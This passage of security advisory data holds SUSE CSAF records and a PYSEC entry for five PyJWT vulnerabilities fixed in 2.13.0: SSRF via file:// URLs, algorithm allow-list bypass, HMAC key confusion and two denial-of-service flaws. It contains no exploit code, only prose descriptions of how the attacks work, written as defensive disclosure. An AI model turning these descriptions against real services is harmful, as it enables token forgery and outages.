"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient.get_signing_key() forces a fresh HTTP request to the JWKS endpoint for every JWT with an unknown kid value, with no rate limiting. Since kid comes from the unverified token header, an attacker can trigger unlimited outbound requests. The vulnerability surfaces only when a JWKS fetch fails; an attacker can attempt to provoke that with sustained unknown-kid traffic, but the outcome depends on upstream JWKS-endpoint behavior (rate limiting, transient errors) which is beyond the attacker\u0027s control. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48524",
"url": "https://www.suse.com/security/cve/CVE-2026-48524"
},
{
"category": "external",
"summary": "SUSE Bug 1266800 for CVE-2026-48524",
"url": "https://bugzilla.suse.com/1266800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.7,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-13T00:00:00Z",
"details": "low"
}
],
"title": "CVE-2026-48524"
},
{
"cve": "CVE-2026-48525",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48525"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. From 2.8.0 to 2.12.1, when verifying detached JWS tokens using the unencoded-payload option (\"b64\": false, RFC 7797), PyJWT performs Base64URL decoding of the compact-serialization payload segment before enforcing the detached-payload rules. For b64=false, PyJWT later discards that decoded payload and replaces it with the caller-provided detached_payload. In practice, this turns the middle segment into an attacker-controlled \u201cwork amplifier\u201d: a remote client can supply an arbitrarily large Base64URL payload segment that forces CPU work + memory allocations even if the signature is invalid. This creates an unauthenticated DoS vector against any endpoint that verifies detached JWS using PyJWT. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48525",
"url": "https://www.suse.com/security/cve/CVE-2026-48525"
},
{
"category": "external",
"summary": "SUSE Bug 1266801 for CVE-2026-48525",
"url": "https://bugzilla.suse.com/1266801"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-13T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-48525"
},
{
"cve": "CVE-2026-48526",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48526"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, when the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48526",
"url": "https://www.suse.com/security/cve/CVE-2026-48526"
},
{
"category": "external",
"summary": "SUSE Bug 1266802 for CVE-2026-48526",
"url": "https://bugzilla.suse.com/1266802"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-13T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-48526"
}
]
}
PYSEC-2026-175
Vulnerability from pysec - Published: 2026-05-28 16:16 - Updated: 2026-06-02 10:34
VLAI
Details
PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib's default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application's jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained "plant a JWKS to forge tokens" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0.
Severity
4.2 (Medium)
Impacted products
| Name | purl | pyjwt | pkg:pypi/pyjwt |
|---|
Aliases
{
"affected": [
{
"ecosystem_specific": {},
"package": {
"ecosystem": "PyPI",
"name": "pyjwt",
"purl": "pkg:pypi/pyjwt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.13.0"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"0.1.1",
"0.1.2",
"0.1.3",
"0.1.4",
"0.1.5",
"0.1.6",
"0.1.7",
"0.1.8",
"0.1.9",
"0.2.0",
"0.2.1",
"0.2.3",
"0.3.0",
"0.3.1",
"0.3.2",
"0.4.0",
"0.4.1",
"0.4.2",
"0.4.3",
"1.0.0",
"1.0.1",
"1.1.0",
"1.3.0",
"1.4.0",
"1.4.1",
"1.4.2",
"1.5.0",
"1.5.1",
"1.5.2",
"1.5.3",
"1.6.0",
"1.6.1",
"1.6.3",
"1.6.4",
"1.7.0",
"1.7.1",
"2.0.0",
"2.0.0a1",
"2.0.0a2",
"2.0.1",
"2.1.0",
"2.10.0",
"2.10.1",
"2.11.0",
"2.12.0",
"2.12.1",
"2.2.0",
"2.3.0",
"2.4.0",
"2.5.0",
"2.6.0",
"2.7.0",
"2.8.0",
"2.9.0"
]
}
],
"aliases": [
"CVE-2026-48522",
"GHSA-993g-76c3-p5m4"
],
"details": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib\u0027s default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application\u0027s jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained \"plant a JWKS to forge tokens\" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0.",
"id": "PYSEC-2026-175",
"modified": "2026-06-02T10:34:20.846008Z",
"published": "2026-05-28T16:16:29.150Z",
"references": [
{
"type": "EVIDENCE",
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
SUSE-SU-2026:22138-1
Vulnerability from csaf_suse - Published: 2026-06-16 09:09 - Updated: 2026-06-16 09:09Summary
Security update for python-PyJWT
Severity
Important
Notes
Title of the patch: Security update for python-PyJWT
Description of the patch: This update for python-PyJWT fixes the following issues
- CVE-2026-48522: `PyJWKClient` passes URI arguments directly to `urllib.request.urlopen()` and allows for SSRF and
token forgery (bsc#1266798).
- CVE-2026-48523: verifier-side algorithm allow-list bypass when `jwt.decode()` or `jwt.decode_complete()` are called
with a PyJWK key (bsc#1266799).
- CVE-2026-48524: unlimited processing of JWTs with unknown kid values by `PyJWKClient.get_signing_key()` leads to
unbounded JWKS endpoint requests and DoS (bsc#1266800).
- CVE-2026-48525: unbounded Base64URL decoding of unused payload segment in `b64=false` detached JWS allows for DoS
(bsc#1266801).
- CVE-2026-48526: no validation of use of JSON Web Keys in HMAC algorithm when decoding JSON Web Tokens allows for
forged HS256 tokens (bsc#1266802).
Patchnames: SUSE-SLE-Micro-6.1-580
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
4.8 (Medium)
Affected products
Recommended
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.4 (Medium)
Affected products
Recommended
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch | — |
Vendor Fix
|
Threats
Impact
low
7.5 (High)
Affected products
Recommended
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
7.4 (High)
Affected products
Recommended
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
References
24 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for python-PyJWT",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for python-PyJWT fixes the following issues\n\n- CVE-2026-48522: `PyJWKClient` passes URI arguments directly to `urllib.request.urlopen()` and allows for SSRF and\n token forgery (bsc#1266798).\n- CVE-2026-48523: verifier-side algorithm allow-list bypass when `jwt.decode()` or `jwt.decode_complete()` are called\n with a PyJWK key (bsc#1266799).\n- CVE-2026-48524: unlimited processing of JWTs with unknown kid values by `PyJWKClient.get_signing_key()` leads to\n unbounded JWKS endpoint requests and DoS (bsc#1266800).\n- CVE-2026-48525: unbounded Base64URL decoding of unused payload segment in `b64=false` detached JWS allows for DoS\n (bsc#1266801).\n- CVE-2026-48526: no validation of use of JSON Web Keys in HMAC algorithm when decoding JSON Web Tokens allows for\n forged HS256 tokens (bsc#1266802).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SLE-Micro-6.1-580",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_22138-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:22138-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202622138-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:22138-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2026-June/047389.html"
},
{
"category": "self",
"summary": "SUSE Bug 1266798",
"url": "https://bugzilla.suse.com/1266798"
},
{
"category": "self",
"summary": "SUSE Bug 1266799",
"url": "https://bugzilla.suse.com/1266799"
},
{
"category": "self",
"summary": "SUSE Bug 1266800",
"url": "https://bugzilla.suse.com/1266800"
},
{
"category": "self",
"summary": "SUSE Bug 1266801",
"url": "https://bugzilla.suse.com/1266801"
},
{
"category": "self",
"summary": "SUSE Bug 1266802",
"url": "https://bugzilla.suse.com/1266802"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48522 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48522/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48523 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48523/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48524 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48524/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48525 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48525/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48526 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48526/"
}
],
"title": "Security update for python-PyJWT",
"tracking": {
"current_release_date": "2026-06-16T09:09:33Z",
"generator": {
"date": "2026-06-16T09:09:33Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:22138-1",
"initial_release_date": "2026-06-16T09:09:33Z",
"revision_history": [
{
"date": "2026-06-16T09:09:33Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch",
"product": {
"name": "python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch",
"product_id": "python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Micro 6.1",
"product": {
"name": "SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sl-micro:6.1"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
},
"product_reference": "python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-48522",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48522"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib\u0027s default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application\u0027s jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained \"plant a JWKS to forge tokens\" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48522",
"url": "https://www.suse.com/security/cve/CVE-2026-48522"
},
{
"category": "external",
"summary": "SUSE Bug 1266798 for CVE-2026-48522",
"url": "https://bugzilla.suse.com/1266798"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-16T09:09:33Z",
"details": "moderate"
}
],
"title": "CVE-2026-48522"
},
{
"cve": "CVE-2026-48523",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48523"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. From 2.9.0 to 2.12.1, there is a verifier-side algorithm allow-list bypass when jwt.decode() or jwt.decode_complete() are called with a PyJWK key. The token header alg is checked against the caller-supplied algorithms allow-list, but signature verification is performed with the algorithm bound to the PyJWK object instead of the header algorithm. An attacker who controls a registered JWK/JWKS private key can sign with a disallowed algorithm, advertise an allowed algorithm in the JWT header, and still be accepted. The issue affects the documented PyJWKClient.get_signing_key_from_jwt(...) flow. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48523",
"url": "https://www.suse.com/security/cve/CVE-2026-48523"
},
{
"category": "external",
"summary": "SUSE Bug 1266799 for CVE-2026-48523",
"url": "https://bugzilla.suse.com/1266799"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-16T09:09:33Z",
"details": "moderate"
}
],
"title": "CVE-2026-48523"
},
{
"cve": "CVE-2026-48524",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48524"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient.get_signing_key() forces a fresh HTTP request to the JWKS endpoint for every JWT with an unknown kid value, with no rate limiting. Since kid comes from the unverified token header, an attacker can trigger unlimited outbound requests. The vulnerability surfaces only when a JWKS fetch fails; an attacker can attempt to provoke that with sustained unknown-kid traffic, but the outcome depends on upstream JWKS-endpoint behavior (rate limiting, transient errors) which is beyond the attacker\u0027s control. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48524",
"url": "https://www.suse.com/security/cve/CVE-2026-48524"
},
{
"category": "external",
"summary": "SUSE Bug 1266800 for CVE-2026-48524",
"url": "https://bugzilla.suse.com/1266800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.7,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-16T09:09:33Z",
"details": "low"
}
],
"title": "CVE-2026-48524"
},
{
"cve": "CVE-2026-48525",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48525"
}
],
"notes": [
{
"category": "general",
